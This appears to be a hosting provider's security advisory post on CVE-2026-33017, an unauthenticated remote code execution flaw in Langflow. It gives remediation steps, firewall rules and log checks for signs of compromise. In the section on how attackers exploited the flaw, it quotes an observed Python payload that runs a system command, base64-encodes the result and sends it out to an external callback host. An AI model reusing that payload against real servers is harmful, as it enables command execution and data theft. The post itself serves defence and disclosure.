On March 17, 2026, a critical remote code execution vulnerability was disclosed in Langflow, the popular open-source visual AI workflow builder with over 145,000 GitHub stars. Within 20 hours — before any public proof-of-concept code even existed — attackers were already exploiting it in the wild. CISA has added CVE-2026-33017 to the Known Exploited Vulnerabilities (KEV) catalog with a federal remediation deadline of April 8, 2026.
If you self-host Langflow on a VPS or bare-metal server, you need to act now. Here is everything you need to know: what the vulnerability does, how attackers are using it, and exactly how to lock down your instance.
What Is Langflow?
Langflow is a Python-based, open-source framework that lets developers build AI agents and retrieval-augmented generation (RAG) pipelines using a drag-and-drop visual editor. Instead of writing complex orchestration code, you arrange components — prompts, models, vector stores, data connectors — on a canvas and wire them together.
It is popular with data science teams, solo developers, and small companies building AI-powered automation. Many self-hosters deploy it on a Cloud VPS alongside tools like n8n and Ollama. Langflow also offers a managed cloud version through DataStax, but the self-hosted deployments are the ones most at risk from this CVE.
CVE-2026-33017: The Technical Breakdown
CVSS Score: 9.8 (Critical, CVSS 3.1)
Type: Unauthenticated Remote Code Execution
Affected Versions: All versions before 1.9.0 (including 1.8.2, which was incorrectly reported as patched)
Fixed In: Langflow 1.9.0+
The vulnerability lives in the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint. This endpoint is designed to let unauthenticated users build “public flows” — a legitimate Langflow feature for sharing workflows. The problem: it accepts attacker-supplied flow definitions containing arbitrary Python code in node definitions, and the server executes that code without any sandboxing.
A single HTTP POST request with a crafted JSON payload is all it takes. No authentication. No credential guessing. No multi-step exploit chain. The attacker sends a flow definition with malicious Python embedded in a component node, and Langflow compiles it into an AST module and passes it directly to Python’s exec() function.
Why the “Fixed” Version 1.8.2 Was Still Vulnerable
This is the second time Langflow has been hit through the same exec() call pattern. A predecessor vulnerability, CVE-2025-3248, was patched by adding authentication to the affected endpoint. But the underlying unsandboxed code execution mechanism was never addressed — the developers gated access instead of fixing the root cause.
When a researcher examined the public flow endpoint (which cannot require authentication by design), they found the exact same execution pipeline. Version 1.8.2 shipped a partial fix that was confirmed by JFrog to still be exploitable. Only version 1.9.0 properly addresses the vulnerability.
How Attackers Exploited It in 20 Hours
According to Sysdig’s threat research team, attackers moved through three distinct phases after the advisory was published on March 17 at 20:05 UTC:
Phase 1: Automated Scanning (Hours 20–21)
Nuclei scanner templates appeared within hours. Attackers scanned the internet for exposed Langflow instances, using interactsh callback domains to confirm vulnerable targets. Scanning requests included telltale indicators like Cookie: client_id=nuclei-scanner and flow names like nuclei-cve-2026-33017.
Phase 2: Reconnaissance and Exploitation (Hours 21–24)
Custom Python-based exploits followed the scanners. Attackers executed system commands (id, ls, cat /etc/passwd) to profile compromised hosts. Payloads used a consistent pattern:
_r = __import__('os').popen('id').read()
_enc = __import__('base64').b64encode(_r.encode()).decode()
__import__('urllib.request').request.urlopen('http://callback.oast.live//' + _enc)This executes a system command, base64-encodes the output, and exfiltrates it over HTTP to an attacker-controlled callback server.
Phase 3: Credential Harvesting (Hours 24–30)
Once inside, attackers targeted the most valuable data on any AI workflow server: the secrets that power it. They extracted:
- .env files containing API keys for OpenAI, Anthropic, AWS, and other services
- .db files with stored flow definitions and embedded credentials
- Environment variable dumps exposing database connection strings
- /etc/passwd and /etc/shadow for lateral movement
Stage-2 payloads were served from attacker infrastructure, indicating that initial access was being converted into persistent backdoors.
Step-by-Step: How to Secure Your Langflow Instance
1. Check Your Current Version
# If installed via pip
pip show langflow | grep Version
# If running in Docker
docker exec langflow pip show langflow | grep Version
# Check the web UI
# Navigate to Settings ? About in the Langflow dashboardIf you are running any version below 1.9.0, you are vulnerable — including 1.8.2.
2. Upgrade to Langflow 1.9.0+
# pip upgrade
pip install langflow --upgrade
# Docker upgrade
docker pull langflowai/langflow:latest
docker compose down && docker compose up -d
# Verify the new version
pip show langflow | grep Version3. Disable Auto-Login Immediately
Langflow ships with AUTO_LOGIN=true by default, which generates a superuser token without requiring authentication. Set it to false:
# In your .env or docker-compose.yml environment block
AUTO_LOGIN=false
LANGFLOW_SUPERUSER=admin
LANGFLOW_SUPERUSER_PASSWORD=<strong-random-password>4. Rotate All Secrets
If your Langflow instance was ever exposed to the internet before patching, assume your secrets are compromised. Rotate:
- All LLM API keys (OpenAI, Anthropic, Cohere, etc.)
- Database connection strings and passwords
- Cloud provider credentials (AWS, GCP, Azure)
- Any API keys stored in .env files or Langflow’s credential store
5. Put Langflow Behind a Reverse Proxy
AI workflow tools should never be exposed directly to the internet. Place Langflow behind a reverse proxy with authentication. Caddy is the fastest option for self-hosters since it handles TLS automatically:
# Caddyfile with basic auth
langflow.yourdomain.com {
basicauth {
admin $2a$14$hashed_password_here
}
reverse_proxy localhost:7860
}For more advanced setups, consider a WireGuard VPN tunnel so Langflow is only accessible from your private network.
6. Restrict Network Access
# UFW: allow only your IP
sudo ufw deny 7860
sudo ufw allow from YOUR_IP to any port 7860
# iptables equivalent
iptables -A INPUT -p tcp --dport 7860 -s YOUR_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 7860 -j DROP7. Check for Indicators of Compromise
Search your access logs for signs of exploitation:
# Check for exploit attempts against the vulnerable endpoint
grep -i "build_public_tmp" /var/log/nginx/access.log
# Look for nuclei scanner fingerprints
grep -i "nuclei-scanner" /var/log/nginx/access.log
# Check for python-requests user agent (common in custom exploits)
grep "python-requests" /var/log/nginx/access.log
# Monitor outbound connections to known C2 infrastructure
ss -tnp | grep -E "(143.110.183.86|173.212.205.251)"The Bigger Picture: AI Tools Are the New Attack Surface
CVE-2026-33017 is not an isolated incident. It follows the same pattern we documented in the n8n critical CVE chain: AI workflow tools that treat code execution as a convenience feature rather than a security boundary.
The 2026 OWASP Top 10 explicitly warns that “a code-generating agent running output in an unsandboxed environment gives attackers a direct path to RCE.” Langflow, n8n, LangChain, MetaGPT, AutoGen, and SWE-Agent all execute code via subprocess or exec(). If you run any of these tools on your server, the same hardening principles apply.
The time-to-exploitation window has collapsed. In 2023, critical vulnerabilities typically had weeks before active exploitation. In 2026, you have hours. CVE-2026-33017 was weaponized before a public PoC even existed — attackers reverse-engineered working exploits directly from the advisory text.
Quick Reference: Your Remediation Checklist
| Action | Priority | Time |
|---|---|---|
| Upgrade to Langflow 1.9.0+ | Critical | 5 min |
| Set AUTO_LOGIN=false | Critical | 2 min |
| Rotate all API keys and secrets | Critical | 15 min |
| Add reverse proxy with auth | High | 20 min |
| Restrict firewall to known IPs | High | 5 min |
| Check logs for IOCs | High | 10 min |
| Audit other AI tools for same pattern | Medium | 30 min |
Next Steps
The CISA KEV deadline is April 8 — one week from today. Federal agencies are required to patch by then, but every self-hoster should treat this as their personal deadline too. If your Langflow instance has been internet-facing at any point since March 17, the safest assumption is that it has already been probed.
For self-hosters building AI workflows on a VPS, Canadian Web Hosting’s Cloud VPS plans include full root access and the firewall control you need to properly isolate tools like Langflow. Combined with Managed Support, you get help configuring reverse proxies and network segmentation so your AI stack stays secure.
Patch today. Rotate your secrets. Put your AI tools behind authentication. The 20-hour exploitation window is already closed — and your data may already be on the other side of it.
Be First to Comment